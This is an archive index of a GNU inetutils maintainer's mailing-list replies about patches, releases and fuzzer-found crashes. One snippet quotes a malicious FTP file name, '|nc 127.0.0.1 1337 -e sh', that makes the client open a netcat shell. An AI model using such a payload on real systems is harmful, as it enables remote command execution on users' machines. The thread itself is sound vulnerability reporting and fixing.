Re: Reproducible tarballs

2024-05-20 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Simon, > > On 5/12/24 3:56 AM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >> I have committed the attached patches giving us reproducible tarballs. >> >> The particular logic to verify this continuously is

Reproducible tarballs

2024-05-12 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
All, I have committed the attached patches giving us reproducible tarballs. The particular logic to verify this continuously is in the 000-reproducibility pipeline job, code here: https://gitlab.com/gnulib/pipeline/-/blob/5b224c783dc4d3ef125f1d3974d895178a820c95/gnu/inetutils.yml#L284 Build

Re: telnet: Make function declarations C23 compatible.

2024-05-12 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > With an exception for some Kerberos 4 stuff, which I cannot test. I > assume the plan is still to remove that as mentioned in TODO? Let's keep that question open for a while more... > Also I think that ./configure --with-shishi is broken, or maybe it is > because I have

Re: libtelnet: Make encryption decls compatible with C23.

2024-05-12 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > On 5/10/24 6:52 AM, Simon Josefsson wrote:>> $ ./configure > CC="gcc-14.1" CFLAGS="-std=c23 -Wstrict-prototypes" > --enable-authentication --enable-encryption --with-krb5 >> >> Ah, you answered my request from the earlier email already :-) > > :) > >> Looks good, and yes

Re: libtelnet: Make encryption decls compatible with C23.

2024-05-10 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > I've applied the attached patch to fix the following error building > libtelnet. I think the only ones remaining are in telnet/*. Once I fix > that maybe these are good for an existing CI job? > > $ ./configure CC="gcc-14.1" CFLAGS="-std=c23 -Wstrict-prototypes" >

Re: maint: Fix most instances of '-Wstrict-prototypes'.

2024-05-10 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi, > > I've pushed this patch already because it seems pretty > uncontroversial. > > Basically converting some K functions to ISO C and not using empty > argument lists: Thanks -- okay with me, although it would have been nice to set up some way to reproduce the issue and

Re: Gnulib & bootstrap updates

2024-05-09 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Simon and Gulliem, > > On 5/8/24 1:06 PM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >> Hi Guillem. I added the bootstrap files to the tarball now. >> >> I'm not convinced that this is a good idea, so let's

Re: maint: Remove unnecessary standard library extern function decls.

2024-05-09 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Simon, > > Are you okay with me pushing the following two patches? > > Patch 0001 removes most (all?) of the extern function decls that > should be in the standard library. They seem harmless, but maybe they > can mess with Gnulib declarations. We should probably just

Re: Gnulib & bootstrap updates

2024-05-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Guillem Jover writes: > Hi! > > On Mon, 2024-05-06 at 18:12:53 +0200, Simon Josefsson via Bug reports for the > GNU Internet utilities wrote: >> I have updated inetutils to latest gnulib (to get the u_* syntax-check >> fixes, and the new faster gnulib-tool.py) and

Re: ifconfig: Fix ASAN 'dynamic-stack-buffer-overflow' in formatting.

2024-05-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > On 5/6/24 6:03 PM, Collin Funk wrote: >> So I am confident it is a bug. I've applied the attached patch which >> seems to fix the issue. This is based on a quick glance of the code so >> I would appreciate others looking it over. Thanks! Thank you! I think we should

Re: cfg.mk: Add checks for 'caddr_t'.

2024-05-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: >> I do mostly agree, however there is another concern: frivolous changes >> like this make it harder to align code with BSD implementations for >> auditing and security backports. I've sporadically coordinated some >> security fixes with tnftp which seems to be the

Gnulib & bootstrap updates

2024-05-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
I have updated inetutils to latest gnulib (to get the u_* syntax-check fixes, and the new faster gnulib-tool.py) and refreshed the bootstrap scripts, please test and report if something broke! /Simon

Re: cfg.mk: Add checks for 'caddr_t'.

2024-05-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > There are some uses of 'caddr_t' in Inetutils. This is a prehistoric > BSD type. I think it was because early versions of C didn't > automatically convert 'void *' to the appropriate type. ... > Patch 0001 adds a syntax check for this type and patch 0002 removes > its uses

Re: cfg.mk: Add checks for 'u_int'.

2024-05-04 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > At some point someone added syntax-checks to fail if old BSD types > were used: > > u_char -> unsigned char > u_short -> unsigned short > u_long -> unsigned long > > But they forgot to do u_int. Patch 0001 adds one for u_int and patch > 0002 removes them.

Re: Indentation mistake

2024-05-03 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Simon, > > On 5/2/24 11:25 AM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >>> Sadly, I cannot do this, at least not easily. After installing GNU >>> indent, "make syntax-check" complains about ma

Re: Indentation mistake

2024-05-02 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi Simon, > > On Thu, May 02, 2024 at 08:08:07PM +0200, Simon Josefsson wrote: >> On Thu 2024-05-02 at 20:05 +0200, Erik Auerswald wrote: >> > On Thu, May 02, 2024 at 07:55:23PM +0200, Simon Josefsson via Bug >> > reports for

Re: Indentation mistake (was: Is TODO up-to-date?)

2024-05-02 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
On Thu 2024-05-02 at 20:05 +0200, Erik Auerswald wrote: > Hi Simon, > > On Thu, May 02, 2024 at 07:55:23PM +0200, Simon Josefsson via Bug > reports for the GNU Internet utilities wrote: > > [...] > > I worry about self-tests though, it would be nice to beef up on

Re: Is TODO up-to-date?

2024-05-02 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi, > > Is the TODO file generally up-to-date? Now that I have my copyright > assignment done, maybe I can find some stuff to hack on. Yay! > Specifically, are these items still true? I think you should pretty much assume very little is up to date or correct in

Re: [PATCHv2] ifconfig: prefix length handling fixes for -A

2024-04-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I have done that in the attached patch. > > I plan to push the changes in a couple of days, unless I receive negative > feedback. Looks great, thank you. /Simon

Re: memset_explicit: Fix compilation error on some OpenSolaris derivatives

2024-04-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Paul, > > On 4/23/24 11:22 PM, Paul Eggert wrote: >> Why is telnetd.h including config.h? Only a top-level C file should >> include config.h, and it should do so at the start. > > I don't disagree. Most of those lines are 20 years old, so I assume it > wasn't a problem

Re: [PATCH] ifconfig: prefix length handling fixes for -A

2024-04-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi, > > while "ifconfig -A" now accepts CIDR notation, it does not reject prefix > length values outside of [0,32]. Also, with a prefix length of 0, > undefined behavior is invoked, and at least on x86_64 a wrong netmask > is computed. > > I think the attached patch

Re: [PATCH] maint: Allow gnulib's readutmp module to use systemd.

2024-03-22 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > Hi Simon, > > On 3/22/24 12:51 PM, Simon Josefsson wrote: >> Hi. Nice catch, thank you. I have added a CI/CD job to catch -lsystemd >> regressions in the future: > > Nice, looks good to me. > >> Thank you for details -- I think this is somewhat subjective, but I do >>

Re: [PATCH] maint: Allow gnulib's readutmp module to use systemd.

2024-03-22 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Collin Funk writes: > When building on GNU/Linux with: > > ./configure --enable-systemd > > there are linker errors due to '-lsystemd' not being passed to the > linker. This is used by Gnulib's readutmp module. Hi. Nice catch, thank you. I have added a CI/CD job to catch -lsystemd regressions

Re: ctime uses in inetutils

2024-02-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Simon Josefsson via Bug reports for the GNU Internet utilities writes: > FYI, I have reluctantly needed to convince myself that inetutils has bugs > related to ctime for years < 1000 or year > and that this is > something that needs to be fixed rather than ignored as irrelevant

ctime uses in inetutils

2024-02-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
FYI, I have reluctantly needed to convince myself that inetutils has bugs related to ctime for years < 1000 or year > and that this is something that needs to be fixed rather than ignored as irrelevant (which was my initial reaction):

Re: 2.5, 2.4 and 2.3 of inetutils...

2024-01-27 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Marty Kazmaier writes: > All give me: > > tftpsubs.c:68:10: fatal error: arpa/tftp.h: No such file or directory >68 | #include > > > When running 'make' on them. ./configure runs fine. I'm using > Windows 10 x64 Pro. What could I possibly be doing wrong? I don't > think I'm missing any

Re: error compiling inetutils 2.5 on macOS Sonoma

2023-12-30 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik A Johnson writes: > compiling inetutils 2.5 on macOS Sonoma gives an error compiling > src/syslogd.c because the third argument in the prototype for ttymsg > is "char *" but macOS /usr/include/util.h has it as "const char *". Thanks for testing! See existing report here:

inetutils-2.5 released [stable]

2023-12-29 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
This is to announce inetutils-2.5, a stable release. GNU Networking Utilities (inetutils) contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger. There

Re: [PATCH] traceroute: Fix hangs or delays in timeout

2023-08-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
James R T writes: > Hi Simon, > > I have filled out the copyright assignment form accordingly. Have you heard back from the FSF on this? It would be nice to review and merge your patch eventually. /Simon > The traceroute implementation by Dmitry Butskoy does not have this > issue. Hence, it

Re: ftp mdtm: invalid command

2023-08-04 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
"Felipe G. Nievinski" writes: > Sorry if it's a silly question, but wouldn't it be better for the FTP > client to support the command names as standardized in IETF RFCs? I don't think that is better -- the "names" in the RFCs are cryptic protocol names, usually not useful for a human interface.

Re: ftp mdtm: invalid command

2023-08-02 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi, > > On Wed, Aug 02, 2023 at 04:01:00PM -0300, Felipe G. Nievinski wrote: >> >> I'm using the FTP utility, which supposedly supports the MDTM command (as >> per section 21.1 Standards of the documentation): >>

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

2023-07-31 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Jeffrey writes: > Patch attached. Thank you! I have pushed this to git. Next time, please run 'make syntax-check' to check your patches (code indentation caused troubles now, but I fixed it) and feel free to include the NEWS blurb in the git patch itself. I'll reach out to the netbsd-tnftpd

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

2023-07-22 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Jeffrey writes: > I found more occurrences of unchecked values for set*id() functions in other > inetutils programs: ftpd, rcp. > > It has different security impact if it can be triggered: > > * rcp: local privilege escalation to the user running the binary > * ftpd: undefined behaviour without

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

2023-07-03 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Thank you Jeffrey, have you signed the copyright assignment form? I'll email it to you privately. /Simon

Re: [PATCH] traceroute: Fix hangs or delays in timeout

2023-04-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Thank you! I was also thinking more how it compares to the "old" traditional traceroute implementations found in BSD's. I'll review the code more carefully when the assignment is complete, and hopefully merge it as-is. /Simon On Mon 2023-04-24 at 17:01 +0800, James R T wrote: > Hi Simon, > >

Re: [PATCH] traceroute: Fix hangs or delays in timeout

2023-04-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Hi. Thank you -- I have sent you the copyright assignment form separately. Meanwhile, could you say something about how other traceroute implementations behave here? Does this patch make ours more consistent with the rest, or is this an area where implementations behave differently? /Simon

Re: ICMPv4 Type 3 Code 13 not implemented

2023-01-26 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi, > > On Sat, Jan 21, 2023 at 04:16:59PM +, Marco wrote: >> >> inetutils-telnet doesn't seem to implement ICMPv4 correctly. > > The telnet client does not use ICMP directly. > >> It doesn't print a proper message when ICMPv4 Type 3 Code 13 is being >> received,

Re: [PATCH] ping: decode unreachable codes added in RFC 4443

2023-01-09 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Enrik Berkhan writes: > RFC 4443 added two new codes for ICMPv6 destination unreachable messages > (type 1): > > 5 - Source address failed ingress/egress policy > 6 - Reject route to destination Hi Enrik. Thank you, I have pushed this:

inetutils-2.4 released [stable]

2022-10-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
We are pleased to announce version 2.4 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: Fwd: freeport(1)

2022-10-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Hi Thanks for the contribution. Given the simplicity of this tool, together with the inherent race condition, and the availability of a shell script that offers similar functionality suggested by Alex Colomar in a reply, my preference is that it is not worth the maintenance burden to introduce a

Re: [PATCH] ifconfig: Support prefix length.

2022-10-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
I have committed this patch here: https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=afe3168ee9f15783c71653bee0ec97536daaf217 Btw, please add NEWS entries next time. I added the following, corrections welcome:

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

2022-10-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Hi. I have committed this now: https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=0b35abbd7a5d074c7e245a49585b2de036d4dec7 /Simon

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

2022-09-28 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Samuel Thibault writes: > Hello, > > Simon Josefsson, on Wed. 28 Sept. 2022 13:46:52 +0200, wrote: >> have you signed copyright assignment papers for InetUtils, > > I didn't know there was copyright assignment for InetUtils :/ > > I now have sent the form to the clerk, but really, such process

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

2022-09-28 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Both your patches look good to me -- however, have you signed copyright assignment papers for InetUtils, or how are these contributed? Generally I'm not sure how useful it is to require copyright assignment for smaller InetUtils contributions -- the majority of the code is not copyright by FSF

Re: How to check for perl or usable printf tools?

2022-09-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hello Simon, > > On 25.09.22 11:19, Simon Josefsson wrote: >> Erik Auerswald writes: >> >>> Hi all, >>> >>> On Mon, Sep 12, 2022 at 12:45:32PM +0200, Erik Auerswald wrote: On Mon, Sep 12, 2022 at 05:16:00AM -0400, Alfred M. Szmidt wrote: > > I am trying to

Re: How to check for perl or usable printf tools?

2022-09-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi all, > > On Mon, Sep 12, 2022 at 12:45:32PM +0200, Erik Auerswald wrote: >> On Mon, Sep 12, 2022 at 05:16:00AM -0400, Alfred M. Szmidt wrote: >> >> I am trying to use the reported input file that crashes tftp for >> >> the test. This file contains

Re: fixing the ftp crashes found via fuzzer

2022-09-21 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I'll try to commit and push regression tests and fixes for the first, > third, and fourth problem during the weekend. Thank you. > What do you all think regarding recursive macros (the second problem)? Having an arbitrary sized recursion limit of, say, depth 100, while

Re: How to check for perl or usable printf tools?

2022-09-12 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I am trying to use the reported input file that crashes tftp for the test. > This file contains non-printable characters (i.e., it is a "binary" file). > I do not want to add this binary file as-is to the git repository. Why? I don't see anything fundamentally wrong

Re: TFTP client crash seems to be caused by missing bounds check in makeargv()

2022-09-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi Simon, > > On Tue, Sep 06, 2022 at 08:05:04PM +0200, Simon Josefsson wrote: >> Erik Auerswald writes: >> > On 04.09.22 17:34, Erik Auerswald wrote: >> >> On 03.09.22 19:07, Erik Auerswald wrote: >> >>> On Sat, Sep 03, 2022 at 05:39:45PM +0200, Simon Josefsson wrote:

Re: [BUG][PATCH] Someone described a remote DoS Vulnerability in telnetd (dereference NULL pointer ---> SEGV)

2022-09-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Guillem Jover writes: > [ Resending with To trimmed. ] > > Hi! > > On Tue, 2022-08-30 at 22:57:51 +0200, Guillem Jover wrote: >> On Sun, 2022-08-28 at 14:40:44 +0200, Erik Auerswald wrote: >> > On Sat, Aug 27, 2022 at 07:37:15PM +0200, Erik Auerswald wrote: >> > > someone has described a remote

Re: TFTP client crash seems to be caused by missing bounds check in makeargv()

2022-09-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi, > > On 04.09.22 17:34, Erik Auerswald wrote: >> On 03.09.22 19:07, Erik Auerswald wrote: >>> On Sat, Sep 03, 2022 at 05:39:45PM +0200, Simon Josefsson wrote: [...] did you notice some fuzzing report that wasn't fixed? >>> [...] >>> * Problems found in tftp

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-09-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> You might want to take a look at: >> >> > > Thanks for pointing out that patch. Without it telnet crashes when > it starts the

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-09-03 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> Please test commit access by pushing the patch, after writing >> a suitable NEWS entry. > > I have just committed and pushed the telnetd crash fix patch[1], > including a NEWS entry. > > [1] https://lists.gnu.org/archive/html/bug-inetutils/2022-08/msg2.html Looks

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-09-02 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
On Fri 2022-09-02 at 20:37 +0200, Erik Auerswald wrote: > Hello Simon, > > On Sat, Jul 09, 2022 at 04:23:20PM +0200, Simon Josefsson wrote: > > [...] > > What's your savannah username? > > [...] > > My Savannah username is "auerswal" > . Welcome!

Re: [BUG][PATCH] Someone described a remote DoS Vulnerability in telnetd (dereference NULL pointer ---> SEGV)

2022-08-30 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> I have attached a completely untested, not even compile >> tested, patch to do this (just the code changes, no NEWS >> or commit log or anything). Please test before committing. > > I have tested the patch now, it compiles and prevents the > crash by preventing the

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-08-05 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > The Debian 11 build fails because it attempts to create a release with > a bogus version number. The error is: > > ... > GEN release-prep > announce-gen: ./NEWS: no news item found for '42.4711' > make[3]: *** [maint.mk:1422: announcement] Error

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-07-09 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hello Simon, > > On Sat, Jul 09, 2022 at 02:36:41PM +0200, Simon Josefsson wrote: >> Erik Auerswald writes: >> > On Fri, Jul 08, 2022 at 08:55:18AM +0200, Erik Auerswald wrote: >> >> On Fri, Jul 08, 2022 at 12:58:37AM +0200, Simon Josefsson wrote: >> >> >> >> > Thanks

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-07-09 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hello Simon, > > On Fri, Jul 08, 2022 at 08:55:18AM +0200, Erik Auerswald wrote: >> On Fri, Jul 08, 2022 at 12:58:37AM +0200, Simon Josefsson wrote: >> >> > Thanks for preparing these, I should have read through all posts >> > before I started working on them

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
> I think we should reach out to some BSD contacts... http://gnats.netbsd.org/cgi-bin/query-pr-single.pl?number=56918 https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=265097 https://marc.info/?l=openbsd-bugs&m=165731429324728&w=2 /Simon

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > It seems to me as if this Netkit project no longer exists. Since I do > not know the upstream project, I have not reported any bugs, and have not > sent any patches. Yeah, the NetKit telnet project is in a sad state. > I do not have a BSD system to test, but anyone who

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I want to look at your new tests, perhaps I can learn how to add some > tests to verify the genget() functionality. The test suite today is rather limited, as you probably have noticed, but going forward it would really help if we created a self-check that triggers a

inetutils-2.3 released [stable]

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
We are pleased to announce version 2.3 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: Supported TLDs

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Marco d'Itri writes: > On Jul 08, Simon Josefsson wrote: > >> I don't know the history of inetutils' fork of (g)whois, is there any >> hope in getting these code-bases merged now? Maybe enough water has >> passed under the bridges... > I see no reasons at this point to tie whois to inetutils

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-07-08 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I'll try to look into this over the weekend, but I cannot promise > anything. But this patch series should just address the same issues > as the patches I sent before, perhaps with some smaller differences. > It's been some time and I do not remember all the details. I

Re: [PATCH 0/3] GNU inetutils telnet client fixes

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Hi, > > On 27.02.22 17:32, Erik Auerswald wrote: >> [...] >> [I have not yet received an answer from the FSF regarding the copyright >> assignment paperwork I have sent.] > > I have just received confirmation that the copyright assignment > has been processed and

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Thanks for preparing these, I should have read through all posts before I started working on them separately... so this patch no longer applies as is. Would you like to re-review these, to see if anything more is still needed after I applied some changes? Maybe it is just the NEWS entries. Btw,

Re: [PATCH 2/3] telnet: Fix TTYPE subnegotiation off-by-one error.

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > Fix off-by-one error in Terminal-Type option subnegotiation if the TERM > variable has exactly 44 bytes. In this case the SE byte (end of > subnegotiation parameters) was replaced by a NUL byte. This concerns > the CVE-2019-0053 fixes. Reported by Erik Auerswald in >

Re: Bug in telnet from inetutils-2.2: Insufficient buffer space for longish DISPLAY names

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > I have attached the output of "git format-patch origin" after locally > committing the patch for this issue and adding a NEWS entry. Please let > me know if this looks OK. Did I miss anything? Looks good to me, thank you!

Re: Supported TLDs

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Chris Reveles writes: > Hello, > > > I hope 2022 is already up to a good start over there. I am doing some > research and I noticed certain TLDs such as .art and .eth are not resolving > properly from the *whois* command, are such domains on the map to be > supported? Thanks for the report -- I

Re: Heap-based Buffer Overflow in logger

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
AiDai writes: > 0x60c0003f is located 1 bytes to the left of 120-byte region Nice catch! Reproducing it is easy: jas@latte:~/src/inetutils$ valgrind src/logger -s '' ... ==339979== Invalid read of size 1 ==339979==at 0x10AA71: send_to_syslog (logger.c:329) ==339979==by 0x10A5CD:

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> This happens when the "unset" command is used with a single space as >> argument, because the "Setlist" contains entries for empty lines that use >> a single space as key, but the setlist.handler is 0 and the setlist.charp >> is NULL: >> >> {" ", "", 0, NULL}, >>

Re: NULL Pointer Dereference in setcmd () at commands.c:1152

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> A NULL Pointer Dereference was discovered in setcmd () at >> commands.c:1152. The vulnerability causes a segmentation fault and >> application crash. ... > The attached patch "inetutils-telnet-set_null_deref_fix.patch" fixes this > by rejecting a set argument with

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: >> A NULL Pointer Dereference was discovered in unsetcmd() at >> inetutils/telnet/commands.c:1227. The vulnerability causes a segmentation >> fault and application crash. ... > The attached patch fixes this: Thank you again. Committed as follows:

Re: NULL Pointer Dereference in help()

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > On Thu, Dec 23, 2021 at 09:15:59PM +0800, AiDai wrote: >> Line 1: # NULL Pointer Dereference in help() at >> inetutils/telnet/commands.c:3094 > > Thanks for fuzzing GNU inetutils! Hi AiDai and Erik. Thanks for the report, debugging and patch! I installed your fixes

Re: [Bug][Patch] Buffer overflow in function makeargv() in telnet/commands.c

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Erik Auerswald writes: > The attached patch fixes this. Hi Erik. Wonderful, what a master-piece of a bug report! Patch installed here: https://git.savannah.gnu.org/gitweb/?p=inetutils.git;a=commitdiff;h=f0c2abdbb720d8396061b75cc47d69edab012864 Since the crash was easy to reproduce, I added

Re: Memory leak in ifconfig

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
AiDai writes: > Direct leak of 64 byte(s) in 1 object(s) allocated from: > #0 0x494bdd in malloc > (/root/disk2/fuzzing/inetutils/fuzz/bin/ifconfig+0x494bdd) > #1 0x4e0330 in linux_if_nameindex > /root/disk2/fuzzing/inetutils/inetutils/ifconfig/./system/linux.c:948:11 > #2 0x4cbfd5

Re: inetutils-2.2 released [stable]

2022-07-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Michael Brunnbauer writes: > Hello Simon, > > it seems to me that the bug which the test code tries to trigger never got > fixed? > > https://sourceware.org/bugzilla/show_bug.cgi?id=11053 Hi. Looks like work on that bug was done shortly after your email, and the last release, and gnulib has

Re: FTP client arbitrary code execution

2021-09-20 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
John Zhau writes: > After some further testing, I've found that I'm still able to get a shell > with the aforementioned payload even with other files in the same > directory. I've also found that I can also get a shell with the following > file name: > > ``` > |nc 127.0.0.1 1337 -e sh > ``` > >

Re: inetutils-2.2 released [stable]

2021-09-10 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Michael Brunnbauer writes: > hi > > On Sun, Sep 05, 2021 at 11:24:34AM +0200, Simon Josefsson wrote: >> Thanks -- interesting, which operating system is this? Knowing that >> would make it easier for me to reproduce it. > > I compile everything myself - sorry. Maybe the problem has to do with

Re: inetutils-2.2 released [stable]

2021-09-05 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Michael Brunnbauer writes: > From syslog: > > conftest[30264]: segfault at 0 ip 7f2bfdf50ce7 sp 7fffd3380918 > error 4 in libc.so.6[7f2bfdec9000+167000] > > From config.log: > > configure:37718: checking for working re_compile_pattern > configure:38031: gcc -o conftest -g -O2

inetutils-2.2 released [stable]

2021-09-01 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
We are pleased to announce version 2.2 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: security issue in inetutils ftp client

2021-07-20 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
ZeddYu Lu writes: > Last year, curl had a security update for CVE-2020-8284. For more info, see > https://hackerone.com/reports/1040166 > > The problem is that the ftp client trusts the host from the PASV response by default. A > malicious server can trick the ftp client into connecting back to a given IP > address

Re: Security Vulnerability Reporting

2021-07-20 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Onur Şahin writes: > Hello, > > I was wondering if there is a process in place for reporting security > vulnerabilities for inetutils? If so, what might that process be? Hi! Right now there isn't much of a formal process -- please post your findings to this mailing list, and we can all try to

Re: A possible hang bug in Telnet

2021-06-07 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Meng Ruijie writes: > Dear Sir/Madam, > > Sorry to bother you. During testing the Inetutils telnet, I found a > likely hang bug. Hope you could have a check. > > After telnet is connected with a telnet server, a telnet server is > crashed, and then telnet will be blocked forever. The reason

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

2021-05-26 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Alex Bochannek writes: > Simon Josefsson writes: > >> Alex Bochannek writes: >> >>> Alex Bochannek writes: >>> I keep debugging what's going on there. I have found an interesting, platform-dependent behavior in Emacs that may or may not be related to this problem. >>> >>> I was

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

2021-05-26 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Alex Bochannek writes: > Alex Bochannek writes: > >> I keep debugging what's going on there. I have found an interesting, >> platform-dependent behavior in Emacs that may or may not be related to >> this problem. > > I was looking at what Bash and tnftp do when they run in an Emacs >

Re: next steps for inetutils?

